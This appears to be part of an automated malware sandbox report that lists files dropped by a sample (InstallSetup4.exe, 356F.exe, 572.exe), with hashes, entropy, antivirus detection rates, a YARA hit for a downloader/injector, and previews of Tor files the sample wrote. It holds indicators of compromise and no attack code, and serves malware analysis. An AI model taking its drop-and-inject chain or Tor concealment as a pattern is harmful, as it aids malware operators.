                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:V:V
                                                                                                                                                                                                                                                                                                                                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                                                                                                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                                                                                                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:0
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):327680
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.488997949477586
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:i88LuFIhUJfTi0aFS8t4pcABVjtRYkM+:18SFIhUJLWDap/B1
                                                                                                                                                                                                                                                                                                                                                                MD5:7C0B88535C506FC8BEC1510F08F3329C
                                                                                                                                                                                                                                                                                                                                                                SHA1:026965F027F53725E0E93D069A7143D12BADD35C
                                                                                                                                                                                                                                                                                                                                                                SHA-256:7F2B4169D20BB191467B02ABCAE4DBC05E80BB5A20AECE8E3D04AAC7F05B0382
                                                                                                                                                                                                                                                                                                                                                                SHA-512:3E5D80F017B99E556A2CE8AC1849AC52E5E1EC38812D015E1DD8E4C276C45E3B5462CA0961D3C806113266B130B350FC993F6734A07A093A5A50BCCC7C5F160B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                                                                                                                                                                                                                                                                                                                                MD5:DA1F22117B9766A1F0220503765A5BA5
                                                                                                                                                                                                                                                                                                                                                                SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                                                                                                                                                                                                                                                                                                                                SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                                                                                                                                                                                                                                                                                                                                SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:@...e.................................R..............@..........
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2052096
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.969636971541683
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:M5pMGXLfbqxnVH0msXHgVNn5Vc0+bPNfjEzsHL:M5jLTqBVUNwHn5Vc0yCsr
                                                                                                                                                                                                                                                                                                                                                                MD5:B14E1A83FF7C4BF582485CC475FFB696
                                                                                                                                                                                                                                                                                                                                                                SHA1:102FF861CFEB7BD0953D5F6DB74F013DDB9AC667
                                                                                                                                                                                                                                                                                                                                                                SHA-256:2D2E0CB1D16BBE40200E1107E24F95A8753D7B6F9A17531C3336EAF63D3FA5D4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:FBDEC548AABB2A7FFD7A6BFDE7F27C8436B7A89690061A0357945696D7DCC03D185A8921F4D827DD7240F06CC61BEADD7C9187D329B43201F4B7530C141DBAB3
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):7668707
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999483604771398
                                                                                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:196608:QBKGhoRYeQ9yHWKNKoLG/Lj31TpOYPHOYhx5ZNyq:C/hoRUcCT/lHzNyq
                                                                                                                                                                                                                                                                                                                                                                MD5:82BEB2A060E63C9C9A26663D0103FAE6
                                                                                                                                                                                                                                                                                                                                                                SHA1:5C6F8FFD78CECC031826600A3E32AB993DB8E97B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:3CBDC920606D1DE26237500736A0A2E7B751513D3BCF815F68B468AE0CC92E8F
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DB9E03E5BBCCC762A4C6A6B34BFC526B9CBA7EB7BB2CD0A2BC160C303BDBCCE756830FC81C4DD1F62187DAB6442AA3E29681F7E518AF0963BE66FC582458D6B7
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\356F.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4315536
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.986023355020629
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:98304:Ox34CiKzvjm7SLtMZTm7LASnwWEuCSeZHe31O6Y/qHYq9Pei:OB4yzvjmEtMf+wT3Us6Y/qHYKB
                                                                                                                                                                                                                                                                                                                                                                MD5:D122F827C4FC73F9A06D7F6F2D08CD95
                                                                                                                                                                                                                                                                                                                                                                SHA1:CD1D1DC2C79C0EE394B72EFC264CFD54D96E1EE5
                                                                                                                                                                                                                                                                                                                                                                SHA-256:B7A6DCFDD64173ECBCEF562FD74AEE07F3639FA863BD5740C7E72DDC0592B4FC
                                                                                                                                                                                                                                                                                                                                                                SHA-512:8755979D7383D6CB5E7D63798C9CA8B9C0FAEEC1FE81907FC75BBBB7BE6754AB7B5A09A98492A27F90E3F26951B6891C43D8ACD21414FB603CD86A4E10DAC986
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):9104384
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9258891229768595
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:196608:drdPa3Pl8j7Ke1k6N25U0agbrT6NZ+t0ZGhsYN6mQwclTm2:d5P08KeDQtSb+t0ZEJQwcTm
                                                                                                                                                                                                                                                                                                                                                                MD5:CEAE65EE17FF158877706EDFE2171501
                                                                                                                                                                                                                                                                                                                                                                SHA1:B1F807080DA9C25393C85F5D57105090F5629500
                                                                                                                                                                                                                                                                                                                                                                SHA-256:0DAC8A3FE3C63611B49DB21B2756B781CC4C9117C64007E0C23E6D3E7CA9EE49
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5214FEBFAB691B53CA132E75E217E82A77E438250695D521DBF6BC1770D828F2E79A0070FD746A73E29ACC11BF9A62CEAFB1CF85547C7C0178D49A740FF9AE7B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                                                • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\356F.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):16296
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.052124604275745
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:384:cMY4QkV6icO1hMtqyd4AW9V9hC1hIhyd24ZFtVf1hc1x2h4YVc1h1FU4WGYgVVd/:6BkoicOaqyrqvUg62M1ux6xyh6ddgV//
                                                                                                                                                                                                                                                                                                                                                                MD5:8F1603CA7F80FAD01AD3C7DCC90CD89B
                                                                                                                                                                                                                                                                                                                                                                SHA1:5F5E36B6999015230E4389FD0E114E29A86B48E8
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9E9E43A8B7FC3C252E908C287C790A0A7147A7BB3E8F4C939B9DEEDEF0EEE373
                                                                                                                                                                                                                                                                                                                                                                SHA-512:23911CE38561D556151523ADC4E1C48BD13B8E6B5253C92221FCDD9D3C73F252819113067BB0D60C2DB205BDD221AB59716BFE821D0BB4B416B0B78517C0686D
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2023-05-17 14:30:40..dir-key-expires 2024-05-17 14:30:40..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvIW/KEA4eoi2rkD6vDKcLu2+2DY5K3pd9P5edSvQ8mBY21CeUfhY..WI+XWr1K9U5/yNsJS8YCvGEtvNK+yEnHkBKLItvi6ibv6W8nP5l4sLhooJBaPm7v..FDhtbnp6HTMbSnBXTxT2gaSPJ+p9
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2769329
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.611801493881774
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:iqGR6/th9CIb6sp4bVmEhkRWPRdc+xWUn/srnM7LpRfW+CXt:i1Ru8kpEDGWOUnSnudQ+Q
                                                                                                                                                                                                                                                                                                                                                                MD5:3A067DB61DDAAC7D61C3F7C8A4BAE018
                                                                                                                                                                                                                                                                                                                                                                SHA1:53CF40FD15FAA8FF5F4FFAD29DDBE792F3A5D3F2
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1FCEACBE916735E8231FCFA12DE98044F1872D14DEA00B1CAE38C9871265E915
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2881C1BA4BC6929F5074E691EF589F35875185CCEFD7670CCE3B850DD61B1E204EA998D1E3FB1AD47B2DF0D2058C89576D72876BB33E457C2C9687D426C4D503
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-05 10:00:00.fresh-until 2024-02-05 11:00:00.valid-until 2024-02-05 13:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (432), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4081
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.288738668097656
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:48:cASzeUqhztJm/r57Qvid3lbXEwQ0qCc0fddXDT6QoHk2n:LzUqhzTm/r6w3lXy3Cdfdd5ck2n
                                                                                                                                                                                                                                                                                                                                                                MD5:F0428034CA3F03B3B460CDBC2D4C67A1
                                                                                                                                                                                                                                                                                                                                                                SHA1:ECE772106FCB63F2B29088C7680ED99B9F365886
                                                                                                                                                                                                                                                                                                                                                                SHA-256:750DC180F54FC8C6CBE4D4B814B589676EC9D14F84010221C2E357EE46683C21
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4467BA3137E79727DE49523D4A6EC54B7EB2ADC06CADAB5BCD0474F7B07BE2206B390951864461216758C99FAEFDD456F7B8F650FE3293C017A95E45671D6CC3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:# Tor state file last generated on 2024-02-05 12:19:18 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 725 2..CircuitBuildTimeBin 775 2..CircuitBuildTimeBin 1225 2..CircuitBuildTimeBin 5825 2..CircuitBuildTimeBin 6275 2..CircuitBuildTimeBin 7575 1..CircuitBuildTimeBin 8225 1..CircuitBuildTimeBin 15975 1..Dormant 0..Guard in=default rsa_id=8C21ADDA21228BB4260C73FD5ED1687070EF53DE nickname=iusearchbtw sampled_on=2024-02-04T19:16:56 sampled_idx=0 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=5C80CB557C96CAD80EF8EC6AB55865329DF74B1B nickname=Droutnutch sampled_on=2024-02-04T11:05:44 sampled_idx=1 sampled_by=0.4.4.9 listed=1 confirmed_on=2024-01-30T19:10:57 confirmed_idx=0 pb_use_attempts=6.000000 pb_use_successes=5.000000 pb_circ_attempts=10.000000 pb_circ_successes=8.000000 pb_successful_circuits_closed=6.000000 pb_collapsed_circuits=1.000000 pb_unusable_circuits=1.000000 pb_timeouts=3.000000..Guard in=default rsa_id=606ECD6
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):16296
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.052124604275745
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:384:cMY4QkV6icO1hMtqyd4AW9V9hC1hIhyd24ZFtVf1hc1x2h4YVc1h1FU4WGYgVVd/:6BkoicOaqyrqvUg62M1ux6xyh6ddgV//
                                                                                                                                                                                                                                                                                                                                                                MD5:8F1603CA7F80FAD01AD3C7DCC90CD89B
                                                                                                                                                                                                                                                                                                                                                                SHA1:5F5E36B6999015230E4389FD0E114E29A86B48E8
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9E9E43A8B7FC3C252E908C287C790A0A7147A7BB3E8F4C939B9DEEDEF0EEE373
                                                                                                                                                                                                                                                                                                                                                                SHA-512:23911CE38561D556151523ADC4E1C48BD13B8E6B5253C92221FCDD9D3C73F252819113067BB0D60C2DB205BDD221AB59716BFE821D0BB4B416B0B78517C0686D
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2023-05-17 14:30:40..dir-key-expires 2024-05-17 14:30:40..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvIW/KEA4eoi2rkD6vDKcLu2+2DY5K3pd9P5edSvQ8mBY21CeUfhY..WI+XWr1K9U5/yNsJS8YCvGEtvNK+yEnHkBKLItvi6ibv6W8nP5l4sLhooJBaPm7v..FDhtbnp6HTMbSnBXTxT2gaSPJ+p9
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (15714)
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):20835900
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.829744783074033
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:ZCiuZ/B1ZioTILtShuOkms54/0+0SvVnjT8uPlVMxedYwA1ZeVJOm0luh9KbdMA4:Z/3dHHO/MoAxWieN7wj1Sspeh+3nz+ms
                                                                                                                                                                                                                                                                                                                                                                MD5:0BFF9E06231B54AAE69A146879CAF990
                                                                                                                                                                                                                                                                                                                                                                SHA1:D3F066603453A965DD99C717EB5A5343DD98EE83
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1F304E70B17FA9BBD6BF939DBE4D5AE4EC96A50493E0C8B91F6CC8353341B052
                                                                                                                                                                                                                                                                                                                                                                SHA-512:EC6ADB9E6B117829ECF44C01444B5AC22F9511E6F01ED9E4216329190D4379AEB1423F4857ADC7DEE43CAEFD5C19F48F32C02CFDED69F06256CA80C3FBD1BA9A
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (432), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4081
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.288738668097656
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:48:cASzeUqhztJm/r57Qvid3lbXEwQ0qCc0fddXDT6QoHk2n:LzUqhzTm/r6w3lXy3Cdfdd5ck2n
                                                                                                                                                                                                                                                                                                                                                                MD5:F0428034CA3F03B3B460CDBC2D4C67A1
                                                                                                                                                                                                                                                                                                                                                                SHA1:ECE772106FCB63F2B29088C7680ED99B9F365886
                                                                                                                                                                                                                                                                                                                                                                SHA-256:750DC180F54FC8C6CBE4D4B814B589676EC9D14F84010221C2E357EE46683C21
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4467BA3137E79727DE49523D4A6EC54B7EB2ADC06CADAB5BCD0474F7B07BE2206B390951864461216758C99FAEFDD456F7B8F650FE3293C017A95E45671D6CC3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:# Tor state file last generated on 2024-02-05 12:19:18 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 725 2..CircuitBuildTimeBin 775 2..CircuitBuildTimeBin 1225 2..CircuitBuildTimeBin 5825 2..CircuitBuildTimeBin 6275 2..CircuitBuildTimeBin 7575 1..CircuitBuildTimeBin 8225 1..CircuitBuildTimeBin 15975 1..Dormant 0..Guard in=default rsa_id=8C21ADDA21228BB4260C73FD5ED1687070EF53DE nickname=iusearchbtw sampled_on=2024-02-04T19:16:56 sampled_idx=0 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=5C80CB557C96CAD80EF8EC6AB55865329DF74B1B nickname=Droutnutch sampled_on=2024-02-04T11:05:44 sampled_idx=1 sampled_by=0.4.4.9 listed=1 confirmed_on=2024-01-30T19:10:57 confirmed_idx=0 pb_use_attempts=6.000000 pb_use_successes=5.000000 pb_circ_attempts=10.000000 pb_circ_successes=8.000000 pb_successful_circuits_closed=6.000000 pb_collapsed_circuits=1.000000 pb_unusable_circuits=1.000000 pb_timeouts=3.000000..Guard in=default rsa_id=606ECD6
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2769329
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.611801493881774
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:iqGR6/th9CIb6sp4bVmEhkRWPRdc+xWUn/srnM7LpRfW+CXt:i1Ru8kpEDGWOUnSnudQ+Q
                                                                                                                                                                                                                                                                                                                                                                MD5:3A067DB61DDAAC7D61C3F7C8A4BAE018
                                                                                                                                                                                                                                                                                                                                                                SHA1:53CF40FD15FAA8FF5F4FFAD29DDBE792F3A5D3F2
                                                                                                                                                                                                                                                                                                                                                                SHA-256:1FCEACBE916735E8231FCFA12DE98044F1872D14DEA00B1CAE38C9871265E915
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2881C1BA4BC6929F5074E691EF589F35875185CCEFD7670CCE3B850DD61B1E204EA998D1E3FB1AD47B2DF0D2058C89576D72876BB33E457C2C9687D426C4D503
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
